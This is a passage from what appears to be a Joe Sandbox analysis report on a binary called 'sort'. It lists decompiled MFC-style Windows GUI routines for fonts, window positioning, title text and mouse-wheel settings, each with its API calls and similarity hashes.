                                            • GetProcAddress.KERNEL32(00000000,ReplaceFile), ref: 00418EAC
                                              • Part of subcall function 00418BE2: __EH_prolog.LIBCMT ref: 00418BE7
                                              • Part of subcall function 00418BE2: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00418C1A
                                              • Part of subcall function 00418BE2: GetTempFileNameA.KERNEL32(00000105,MFC,00000000,00000000,00000105), ref: 00418C40
                                              • Part of subcall function 00416AEC: InterlockedDecrement.KERNEL32(-000000F4), ref: 00416B00
                                            • lstrlenA.KERNEL32(?), ref: 00418EFD
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001), ref: 00418F20
                                            • lstrlenA.KERNEL32(?,?,00000001), ref: 00418F3F
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001,?,00000001), ref: 00418F62
                                            • lstrlenA.KERNEL32(?,?,00000001,?,00000001), ref: 00418F80
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001,?,00000001,?,00000001), ref: 00418FA0
                                            • GetLastError.KERNEL32(?,?,?,00000003,00000000,00000000,?,00000001,?,00000001,?,00000001), ref: 00418FBB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWidelstrlen$ErrorH_prologHandleInterlockedLastName$AddressCloseDecrementFileFullIncrementModulePathProcTemp
                                            • String ID: KERNEL32$ReplaceFile
                                            • API String ID: 3306742873-430465611
                                            • Opcode ID: 88258920094b3836d872303bd4dae8ab2e6e518f2c46b2e7802181e9aab17937
                                            • Instruction ID: 35d1a50c5f76602bfe157e4308a6fe3e42fd926e881e06ee79976fcc1b195d94
                                            • Opcode Fuzzy Hash: 88258920094b3836d872303bd4dae8ab2e6e518f2c46b2e7802181e9aab17937
                                            • Instruction Fuzzy Hash: 4B516FB2D00219AFCB10EFA5CC858EFBBB9EF08354B51056EE411B3250DB389E45CB69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 85%
                                            			E00422A19(void* __edi, void* __esi) {
                                            				void* _t28;
                                            				void* _t31;
                                            				void* _t42;
                                            				struct HFONT__* _t50;
                                            				void* _t53;
                                            				void* _t64;
                                            				void* _t65;
                                            				void* _t67;
                                            				void* _t70;
                                            				intOrPtr _t76;
                                            				void* _t77;
                                            				void* _t79;
                                            				void* _t86;
                                            
                                            				_t67 = __esi;
                                            				_t64 = __edi;
                                            				_t28 = E00406520(E0042A954, _t70);
                                            				_t76 =  *0x439c44; // 0x1
                                            				if(_t76 != 0) {
                                            					L21:
                                            					 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
                                            					return _t28;
                                            				}
                                            				E00425F56(0xa);
                                            				_t77 =  *0x439ca4; // 0x0
                                            				if(_t77 == 0) {
                                            					_t53 = LoadBitmapA( *(E00424BFB() + 0xc), 0x7912);
                                            					 *0x439ca4 = _t53;
                                            					if(GetObjectA(_t53, 0x18, _t70 - 0x78) != 0) {
                                            						 *0x439c98 =  *((intOrPtr*)(_t70 - 0x74));
                                            						 *0x439c9c =  *((intOrPtr*)(_t70 - 0x70));
                                            					}
                                            				}
                                            				_t79 =  *0x439ca0; // 0x0
                                            				if(_t79 != 0) {
                                            					L11:
                                            					_push(_t67);
                                            					_push(_t64);
                                            					_push(0);
                                            					E0041A369(_t70 - 0x24, _t82);
                                            					_t31 =  *0x439ca0; // 0x0
                                            					 *(_t70 - 4) = 0;
                                            					if(_t31 == 0) {
                                            						_t65 = 0;
                                            						__eflags = 0;
                                            					} else {
                                            						_t65 = SelectObject( *(_t70 - 0x20), _t31);
                                            					}
                                            					 *((intOrPtr*)(_t70 - 0x10)) = GetTextMetricsA( *(_t70 - 0x1c), _t70 - 0xb0);
                                            					if(_t65 != 0) {
                                            						SelectObject( *(_t70 - 0x20), _t65);
                                            					}
                                            					if( *((intOrPtr*)(_t70 - 0x10)) == 0) {
                                            						L18:
                                            						E0041A89B(0x439ca0);
                                            						goto L19;
                                            					} else {
                                            						_t86 =  *(_t70 - 0xb0) -  *((intOrPtr*)(_t70 - 0xa4)) -  *0x439c9c; // 0x0
                                            						if(_t86 <= 0) {
                                            							L19:
                                            							 *(_t70 - 4) =  *(_t70 - 4) | 0xffffffff;
                                            							E0041A3DB(_t70 - 0x24);
                                            							goto L20;
                                            						}
                                            						goto L18;
                                            					}
                                            				} else {
                                            					E00406330(_t70 - 0x60, 0, 0x3c);
                                            					 *((char*)(_t70 - 0x49)) = 1;
                                            					 *((intOrPtr*)(_t70 - 0x50)) = 0x190;
                                            					_t42 = 1;
                                            					 *(_t70 - 0x60) = _t42 -  *0x439c9c;
                                            					if(GetSystemMetrics(0x2a) == 0) {
                                            						_push("Small Fonts");
                                            					} else {
                                            						_push("Terminal");
                                            					}
                                            					lstrcpyA(_t70 - 0x44, ??);
                                            					if(E0041A6E1(0xf233, _t70 - 0x60) == 0) {
                                            						 *((char*)(_t70 - 0x45)) = 0x20;
                                            					}
                                            					_t50 = CreateFontIndirectA(_t70 - 0x60);
                                            					_t82 = _t50;
                                            					 *0x439ca0 = _t50;
                                            					if(_t50 == 0) {
                                            						L20:
                                            						_t28 = E00425FC6(0xa);
                                            						goto L21;
                                            					} else {
                                            						goto L11;
                                            					}
                                            				}
                                            			}

















                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00422A1E
                                              • Part of subcall function 00425F56: EnterCriticalSection.KERNEL32(00439A28,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425F91
                                              • Part of subcall function 00425F56: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425FA3
                                              • Part of subcall function 00425F56: LeaveCriticalSection.KERNEL32(00439A28,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425FAC
                                              • Part of subcall function 00425F56: EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26,00412700), ref: 00425FBE
                                            • LoadBitmapA.USER32 ref: 00422A55
                                            • GetObjectA.GDI32(00000000,00000018,?), ref: 00422A67
                                            • GetSystemMetrics.USER32 ref: 00422AB1
                                            • lstrcpyA.KERNEL32(?,Small Fonts,?,0000000A), ref: 00422ACB
                                            • CreateFontIndirectA.GDI32(?), ref: 00422AEB
                                            • SelectObject.GDI32(?,00000000), ref: 00422B1B
                                            • GetTextMetricsA.GDI32(?,?), ref: 00422B2D
                                            • SelectObject.GDI32(?,00000000), ref: 00422B3E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: CriticalSection$Object$EnterMetricsSelect$BitmapCreateFontH_prologIndirectInitializeLeaveLoadSystemTextlstrcpy
                                            • String ID: $Small Fonts$Terminal
                                            • API String ID: 1234877182-3042510724
                                            • Opcode ID: 29564cb59527804121ee2a9ce267bff2e1028d7c4982a5c458cb6d41a7627f25
                                            • Instruction ID: af1173b3a4b80694a70ec61d8b55af463f2ab6573842c533f6f97c7bdcca2de6
                                            • Opcode Fuzzy Hash: 29564cb59527804121ee2a9ce267bff2e1028d7c4982a5c458cb6d41a7627f25
                                            • Instruction Fuzzy Hash: 72417171B00219AFDB20DFA5ED85AAE7BB5FB04344F94013AE505E6191DBB85D01CB29
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041ABA7() {
                                            				void* _v8;
                                            				int _v12;
                                            				int _v16;
                                            				char _v144;
                                            				void _t9;
                                            				struct HWND__* _t20;
                                            				void _t21;
                                            				int _t22;
                                            				int _t23;
                                            				int _t27;
                                            				short _t28;
                                            				intOrPtr _t30;
                                            
                                            				_t27 =  *0x437cdc; // 0x0
                                            				if(_t27 != 0) {
                                            					L16:
                                            					_t9 =  *0x439c90; // 0x0
                                            					return _t9;
                                            				}
                                            				_t28 =  *0x439c8c; // 0x0
                                            				 *0x437cdc = 1;
                                            				if(_t28 != 0) {
                                            					L10:
                                            					__eflags =  *0x439c8c - 2;
                                            					if( *0x439c8c != 2) {
                                            						L4:
                                            						_t30 =  *0x439c3c; // 0x1
                                            						 *0x439c90 = 3;
                                            						if(_t30 != 0) {
                                            							__eflags =  *0x439c38; // 0x0
                                            							if(__eflags == 0) {
                                            								SystemParametersInfoA(0x68, 0, 0x439c90, 0);
                                            							}
                                            						} else {
                                            							if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop", 0, 1,  &_v8) == 0) {
                                            								_v12 = 0x80;
                                            								if(RegQueryValueExA(_v8, "WheelScrollLines", 0,  &_v16,  &_v144,  &_v12) == 0) {
                                            									 *0x439c90 = E0040718F( &_v144, 0, 0xa);
                                            								}
                                            								RegCloseKey(_v8);
                                            							}
                                            						}
                                            						goto L16;
                                            					}
                                            					_t20 = FindWindowA("MouseZ", "Magellan MSWHEEL");
                                            					__eflags = _t20;
                                            					if(_t20 == 0) {
                                            						goto L4;
                                            					}
                                            					_t23 =  *0x439c88; // 0x0
                                            					__eflags = _t23;
                                            					if(_t23 == 0) {
                                            						goto L4;
                                            					}
                                            					_t21 = SendMessageA(_t20, _t23, 0, 0);
                                            					 *0x439c90 = _t21;
                                            					return _t21;
                                            				}
                                            				_t22 = RegisterWindowMessageA("MSH_SCROLL_LINES_MSG");
                                            				 *0x439c88 = _t22;
                                            				if(_t22 != 0) {
                                            					 *0x439c8c = 2;
                                            					goto L10;
                                            				} else {
                                            					 *0x439c8c = 1;
                                            					goto L4;
                                            				}
                                            			}
















                                            APIs
                                            • RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG), ref: 0041ABDB
                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop,00000000,00000001,?), ref: 0041AC1E
                                            • RegQueryValueExA.ADVAPI32(?,WheelScrollLines,00000000,?,?,?), ref: 0041AC4B
                                            • RegCloseKey.ADVAPI32(?), ref: 0041AC6F
                                            • FindWindowA.USER32 ref: 0041AC98
                                            • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 0041ACB8
                                            • SystemParametersInfoA.USER32(00000068,00000000,00439C90,00000000), ref: 0041ACD6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: MessageWindow$CloseFindInfoOpenParametersQueryRegisterSendSystemValue
                                            • String ID: Control Panel\Desktop$MSH_SCROLL_LINES_MSG$Magellan MSWHEEL$MouseZ$WheelScrollLines
                                            • API String ID: 1228133072-821443377
                                            • Opcode ID: 95f70896755e55a52fc01f3e5765352c2d6134ba5801c03a0d6e533f6f354ec8
                                            • Instruction ID: 5c83e38d2889ea35cb43268cbe58cad34713885164d32870b4297f9966653a84
                                            • Opcode Fuzzy Hash: 95f70896755e55a52fc01f3e5765352c2d6134ba5801c03a0d6e533f6f354ec8
                                            • Instruction Fuzzy Hash: B0216F70A45214ABDB309B51EC49AEB3BB8FB00744F506026E405D2260EBB85DD5DFDE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 89%
                                            			E00421F4E(void* __ecx, CHAR* _a4) {
                                            				char _v520;
                                            				intOrPtr _t36;
                                            				intOrPtr _t45;
                                            				void* _t55;
                                            				void* _t56;
                                            
                                            				_t55 = __ecx;
                                            				if((E00416528(__ecx) & 0x00000040) == 0) {
                                            					lstrcpyA( &_v520,  *(__ecx + 0xac));
                                            					if(_a4 != 0) {
                                            						lstrcatA( &_v520, " - ");
                                            						lstrcatA( &_v520, _a4);
                                            						_t36 =  *((intOrPtr*)(_t55 + 0x40));
                                            						if(_t36 > 0) {
                                            							_push(_t36);
                                            							wsprintfA(_t56 + lstrlenA( &_v520) - 0x204, ":%d");
                                            						}
                                            					}
                                            					L9:
                                            					return E0041A843( *((intOrPtr*)(_t55 + 0x1c)),  &_v520);
                                            				}
                                            				_v520 = _v520 & 0x00000000;
                                            				if(_a4 == 0) {
                                            					L5:
                                            					lstrcatA( &_v520,  *(_t55 + 0xac));
                                            					goto L9;
                                            				}
                                            				lstrcpyA( &_v520, _a4);
                                            				_t45 =  *((intOrPtr*)(_t55 + 0x40));
                                            				if(_t45 > 0) {
                                            					_push(_t45);
                                            					wsprintfA(_t56 + lstrlenA( &_v520) - 0x204, ":%d");
                                            				}
                                            				lstrcatA( &_v520, " - ");
                                            				goto L5;
                                            			}









                                            APIs
                                              • Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534
                                            • lstrcpyA.KERNEL32(00000000,00000000), ref: 00421F82
                                            • lstrlenA.KERNEL32(00000000,:%d,?), ref: 00421F9C
                                            • wsprintfA.USER32 ref: 00421FAA
                                            • lstrcatA.KERNEL32(00000000, - ), ref: 00421FBF
                                            • lstrcatA.KERNEL32(00000000,?), ref: 00421FCE
                                            • lstrcpyA.KERNEL32(?,?), ref: 00421FDF
                                            • lstrcatA.KERNEL32(?, - ), ref: 00421FFD
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00422009
                                            • lstrlenA.KERNEL32(?,:%d,?), ref: 0042201F
                                            • wsprintfA.USER32 ref: 0042202D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: lstrcat$lstrcpylstrlenwsprintf$LongWindow
                                            • String ID: - $:%d
                                            • API String ID: 3078587954-2359489159
                                            • Opcode ID: 6d21e6e38d927462feef01ef09ad18ff503edbabfb763a1af246d99f2b2f3c6b
                                            • Instruction ID: ae4adf689d7d90f23104f1149d1543740a665fba2c23219458a983a253b49f06
                                            • Opcode Fuzzy Hash: 6d21e6e38d927462feef01ef09ad18ff503edbabfb763a1af246d99f2b2f3c6b
                                            • Instruction Fuzzy Hash: 5A2123B1A0031EEBCB20ABA5ED4DF8A77ACEF40344F5044A6E615D2151D778E645CF98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 90%
                                            			E00415B0F(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                            				signed int _v5;
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				struct tagRECT _v28;
                                            				struct tagRECT _v44;
                                            				struct tagRECT _v60;
                                            				struct tagRECT _v80;
                                            				char _v100;
                                            				intOrPtr _t55;
                                            				struct HWND__* _t56;
                                            				intOrPtr _t78;
                                            				intOrPtr _t90;
                                            				signed int _t99;
                                            				struct HWND__* _t100;
                                            				struct HWND__* _t102;
                                            				void* _t104;
                                            				long _t110;
                                            				void* _t113;
                                            				struct HWND__* _t115;
                                            				void* _t117;
                                            				intOrPtr _t119;
                                            				intOrPtr _t123;
                                            
                                            				_t113 = __edx;
                                            				_t119 = __ecx;
                                            				_v12 = __ecx;
                                            				_v8 = E00416528(__ecx);
                                            				_t55 = _a4;
                                            				if(_t55 == 0) {
                                            					if((_v5 & 0x00000040) == 0) {
                                            						_t56 = GetWindow( *(__ecx + 0x1c), 4);
                                            					} else {
                                            						_t56 = GetParent( *(__ecx + 0x1c));
                                            					}
                                            					_t115 = _t56;
                                            					if(_t115 != 0) {
                                            						_t100 = SendMessageA(_t115, 0x36b, 0, 0);
                                            						if(_t100 != 0) {
                                            							_t115 = _t100;
                                            						}
                                            					}
                                            				} else {
                                            					_t115 =  *(_t55 + 0x1c);
                                            				}
                                            				GetWindowRect( *(_t119 + 0x1c),  &_v44);
                                            				if((_v5 & 0x00000040) != 0) {
                                            					_t102 = GetParent( *(_t119 + 0x1c));
                                            					GetClientRect(_t102,  &_v28);
                                            					GetClientRect(_t115,  &_v60);
                                            					MapWindowPoints(_t115, _t102,  &_v60, 2);
                                            				} else {
                                            					if(_t115 != 0) {
                                            						_t99 = GetWindowLongA(_t115, 0xfffffff0);
                                            						if((_t99 & 0x10000000) == 0 || (_t99 & 0x20000000) != 0) {
                                            							_t115 = 0;
                                            						}
                                            					}
                                            					_v100 = 0x28;
                                            					if(_t115 != 0) {
                                            						GetWindowRect(_t115,  &_v60);
                                            						E00404F6B(E00404F00(_t115, 2),  &_v100);
                                            						CopyRect( &_v28,  &_v80);
                                            					} else {
                                            						_t90 = E00404DAE();
                                            						if(_t90 != 0) {
                                            							_t90 =  *((intOrPtr*)(_t90 + 0x1c));
                                            						}
                                            						E00404F6B(E00404F00(_t90, 1),  &_v100);
                                            						CopyRect( &_v60,  &_v80);
                                            						CopyRect( &_v28,  &_v80);
                                            					}
                                            				}
                                            				_t117 = _v44.right - _v44.left;
                                            				asm("cdq");
                                            				_t104 = _v44.bottom - _v44.top;
                                            				asm("cdq");
                                            				_t114 = _v60.bottom;
                                            				_t110 = (_v60.left + _v60.right - _t113 >> 1) - (_t117 - _t113 >> 1);
                                            				asm("cdq");
                                            				asm("cdq");
                                            				_t123 = (_v60.top + _v60.bottom - _v60.bottom >> 1) - (_t104 - _t114 >> 1);
                                            				if(_t110 >= _v28.left) {
                                            					_t78 = _v28.right;
                                            					if(_t117 + _t110 > _t78) {
                                            						_t110 = _t78 - _v44.right + _v44.left;
                                            					}
                                            				} else {
                                            					_t110 = _v28.left;
                                            				}
                                            				if(_t123 >= _v28.top) {
                                            					if(_t104 + _t123 > _v28.bottom) {
                                            						_t123 = _v44.top - _v44.bottom + _v28.bottom;
                                            					}
                                            				} else {
                                            					_t123 = _v28.top;
                                            				}
                                            				return E0041663D(_v12, 0, _t110, _t123, 0xffffffff, 0xffffffff, 0x15);
                                            			}


























                                            APIs
                                              • Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534
                                            • GetParent.USER32(?), ref: 00415B3A
                                            • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 00415B5D
                                            • GetWindowRect.USER32 ref: 00415B76
                                            • GetWindowLongA.USER32 ref: 00415B89
                                            • CopyRect.USER32 ref: 00415BD6
                                            • CopyRect.USER32 ref: 00415BE0
                                            • GetWindowRect.USER32 ref: 00415BE9
                                            • CopyRect.USER32 ref: 00415C05
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Rect$Window$Copy$Long$MessageParentSend
                                            • String ID:
                                            • API String ID: 808654186-0
                                            • Opcode ID: 08e789acf66eab3a19b7e86daab60fd72cfb8a595c4ec189871ddf3cd5da10ba
                                            • Instruction ID: 84b52a2fdf36364977305fff30e360f87450067914530d6a9d7fdd5b83c17d5a
                                            • Opcode Fuzzy Hash: 08e789acf66eab3a19b7e86daab60fd72cfb8a595c4ec189871ddf3cd5da10ba
                                            • Instruction Fuzzy Hash: A4517571A04619AFCB10DFA8DC85EEEBBB9AF84314F154125E501F3291D734B9468B98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 97%
                                            			E00428D7F(intOrPtr* __ecx) {
                                            				struct tagSIZE _v12;
                                            				int _v16;
                                            				struct tagSIZE _v24;
                                            				void* _v28;
                                            				int _v32;
                                            				struct tagLOGFONTA _v92;
                                            				struct tagTEXTMETRICA _v148;
                                            				void* _t64;
                                            				long _t70;
                                            				void* _t79;
                                            				signed int _t83;
                                            				signed int _t84;
                                            				void* _t91;
                                            				int _t117;
                                            				void* _t119;
                                            				void** _t122;
                                            
                                            				_t121 = __ecx;
                                            				if( *(__ecx + 8) != 0) {
                                            					_t64 =  *(__ecx + 0x2c);
                                            					if(_t64 == 0) {
                                            						_push(0xe);
                                            						return  *((intOrPtr*)( *__ecx + 0x24))();
                                            					}
                                            					if( *((intOrPtr*)(__ecx + 4)) != 0) {
                                            						GetObjectA(_t64, 0x3c,  &_v92);
                                            						GetTextFaceA( *(__ecx + 8), 0x20,  &(_v92.lfFaceName));
                                            						GetTextMetricsA( *(__ecx + 8),  &_v148);
                                            						_t70 = _v148.tmHeight;
                                            						if(_t70 >= 0) {
                                            							_v92.lfHeight = _v148.tmInternalLeading - _t70;
                                            						} else {
                                            							_v92.lfHeight = _t70;
                                            						}
                                            						_v92.lfWidth = _v148.tmAveCharWidth;
                                            						_v92.lfWeight = _v148.tmWeight;
                                            						_v92.lfItalic = _v148.tmItalic;
                                            						_v92.lfUnderline = _v148.tmUnderlined;
                                            						_v92.lfStrikeOut = _v148.tmStruckOut;
                                            						_v92.lfCharSet = _v148.tmCharSet;
                                            						_v92.lfPitchAndFamily = _v148.tmPitchAndFamily;
                                            						_t79 = CreateFontIndirectA( &_v92);
                                            						_v28 = _t79;
                                            						SelectObject( *(_t121 + 4), _t79);
                                            						GetTextMetricsA( *(_t121 + 4),  &_v148);
                                            						_t83 = _v148.tmHeight;
                                            						_t117 =  ~(_v92.lfHeight);
                                            						if(_t83 >= 0) {
                                            							_t84 = _t83 - _v148.tmInternalLeading;
                                            						} else {
                                            							_t84 =  ~_t83;
                                            						}
                                            						_v16 = _t84;
                                            						GetWindowExtEx( *(_t121 + 4),  &_v12);
                                            						GetViewportExtEx( *(_t121 + 4),  &_v24);
                                            						if(_v12.cy < 0) {
                                            							_v12.cy =  ~(_v12.cy);
                                            						}
                                            						if(_v24.cy < 0) {
                                            							_v24.cy =  ~(_v24.cy);
                                            						}
                                            						_v32 = MulDiv(_t117, _v24.cy, _v12.cy);
                                            						if(_v32 >= MulDiv(_v16, _v24.cy, _v12.cy)) {
                                            							_t119 = _v28;
                                            						} else {
                                            							_v92.lfFaceName = _v92.lfFaceName & 0x00000000;
                                            							_v92.lfPitchAndFamily = (_v92.lfPitchAndFamily & 0 | (_v92.lfPitchAndFamily & 0x000000f0) != 0x00000050) - 0x00000001 & 0x00000050;
                                            							_t119 = CreateFontIndirectA( &_v92);
                                            							SelectObject( *(_t121 + 4), _t119);
                                            							DeleteObject(_v28);
                                            						}
                                            						_t122 = _t121 + 0x28;
                                            						_t91 = E0041A89B(_t122);
                                            						 *_t122 = _t119;
                                            						return _t91;
                                            					}
                                            				}
                                            				return _t64;
                                            			}




















                                            APIs
                                            • GetObjectA.GDI32(?,0000003C,?), ref: 00428DBB
                                            • GetTextFaceA.GDI32(00000000,00000020,?), ref: 00428DCA
                                            • GetTextMetricsA.GDI32(00000000,?), ref: 00428DE0
                                            • CreateFontIndirectA.GDI32(?), ref: 00428E30
                                            • SelectObject.GDI32(00000000,00000000), ref: 00428E39
                                            • GetTextMetricsA.GDI32(00000000,?), ref: 00428E49
                                            • GetWindowExtEx.GDI32(00000000,00000000), ref: 00428E6E
                                            • GetViewportExtEx.GDI32(00000000,?), ref: 00428E7B
                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 00428EAA
                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 00428EB8
                                            • CreateFontIndirectA.GDI32(?), ref: 00428ED8
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Text$CreateFontIndirectMetricsObject$FaceSelectViewportWindow
                                            • String ID:
                                            • API String ID: 3870699365-0
                                            • Opcode ID: 10801792fbe3792cf5b3815eddb952798c023c596e164af8040c919a982e3b9b
                                            • Instruction ID: d30efaf7af162c4076970c06207e774494d4aa7f708cde8adb03360c61ae062c
                                            • Opcode Fuzzy Hash: 10801792fbe3792cf5b3815eddb952798c023c596e164af8040c919a982e3b9b
                                            • Instruction Fuzzy Hash: 15518531A01299EFCF21CFE8DD44AEEBBB9EF18300F14446AE455A7221D734AA46DF54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 83%
                                            			E00422E02(intOrPtr __ecx, struct tagPOINT _a4, intOrPtr _a8) {
                                            				signed char _v6;
                                            				signed int _v7;
                                            				signed int _v8;
                                            				signed int _v12;
                                            				intOrPtr _v16;
                                            				intOrPtr _v20;
                                            				signed int _v28;
                                            				struct tagRECT _v44;
                                            				struct tagRECT _v60;
                                            				struct tagRECT _v112;
                                            				intOrPtr _t141;
                                            				void* _t144;
                                            				intOrPtr _t145;
                                            				intOrPtr _t148;
                                            				void* _t150;
                                            				signed int _t151;
                                            				void* _t161;
                                            				int _t177;
                                            				void* _t184;
                                            				signed int _t188;
                                            				void* _t190;
                                            				signed int _t194;
                                            				void* _t196;
                                            				void* _t198;
                                            				signed int _t205;
                                            				int _t206;
                                            				void* _t219;
                                            				intOrPtr _t238;
                                            				intOrPtr _t241;
                                            				int _t243;
                                            				signed int _t245;
                                            				signed int _t246;
                                            				int _t251;
                                            
                                            				_t241 = __ecx;
                                            				_v16 = __ecx;
                                            				_v8 = E00416528(__ecx);
                                            				GetWindowRect( *(__ecx + 0x1c),  &_v44);
                                            				_t205 = GetSystemMetrics(0x21);
                                            				_v12 = _t205;
                                            				_v28 = GetSystemMetrics(0x20);
                                            				if( *0x439c44 != 0) {
                                            					_t177 = E004136A7(_t241);
                                            					_t251 = _t177;
                                            					_t243 = 2;
                                            					if( *0x439c3c == 0 || (_v7 & 0x00000010) == 0) {
                                            						L6:
                                            						if(_t251 < 0xa || _t251 > 0x11) {
                                            							if(_t251 != 4) {
                                            								goto L17;
                                            							}
                                            							goto L9;
                                            						} else {
                                            							L9:
                                            							if((_v7 & 0x00000008) == 0) {
                                            								InflateRect( &_v44,  ~_v28,  ~_t205);
                                            								if((_v7 & 0x00000002) == 0) {
                                            									L17:
                                            									return _t251;
                                            								}
                                            								_t184 = _t251 - 4;
                                            								if(_t184 == 0) {
                                            									L22:
                                            									_t188 = (0 | _a8 - _v44.bottom <= 0x00000000) - 0x00000001 & 0x00000004;
                                            									L23:
                                            									return _t188 + 0xb;
                                            								}
                                            								_t190 = _t184 - 9;
                                            								if(_t190 == 0) {
                                            									_t194 = (0 | _a8 - _v44.top >= 0x00000000) - 0x00000001 & _t243;
                                            									L19:
                                            									return _t194 + 0xa;
                                            								}
                                            								_t196 = _t190 - 1;
                                            								if(_t196 == 0) {
                                            									_t188 = 0 | _a8 - _v44.top < 0x00000000;
                                            									goto L23;
                                            								}
                                            								_t198 = _t196 - _t243;
                                            								if(_t198 == 0) {
                                            									_t194 = (0 | _a8 - _v44.bottom <= 0x00000000) - 0x00000001 & 0x00000005;
                                            									goto L19;
                                            								}
                                            								if(_t198 == 1) {
                                            									goto L22;
                                            								}
                                            								goto L17;
                                            							}
                                            							return _t243;
                                            						}
                                            					} else {
                                            						if(_t251 == 3) {
                                            							_t251 = _t243;
                                            						}
